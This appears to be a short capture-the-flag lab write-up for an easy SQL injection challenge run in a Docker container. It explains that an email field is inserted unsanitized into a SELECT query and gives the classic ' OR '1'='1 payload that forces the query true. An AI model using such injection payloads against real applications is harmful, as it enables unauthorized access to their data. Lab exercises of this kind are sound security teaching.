
docker run -d -p 9006:80 --name flag5 --restart always joshbeck2024/ctf-sql-inject-flag-5
-This is an easy challenge
-Points: 20
SQL Injection!

Identify the Vulnerability The application takes user input from the email field and uses it directly in a SQL query without sanitization. The backend query likely looks something like this:
SELECT * FROM code_table WHERE email = '$user_input'
Craft the Payload We want to force the query to return TRUE regardless of whether the email exists. A classic payload is:
' OR '1'='1
SELECT * FROM code_table WHERE email = '' OR '1'='1'
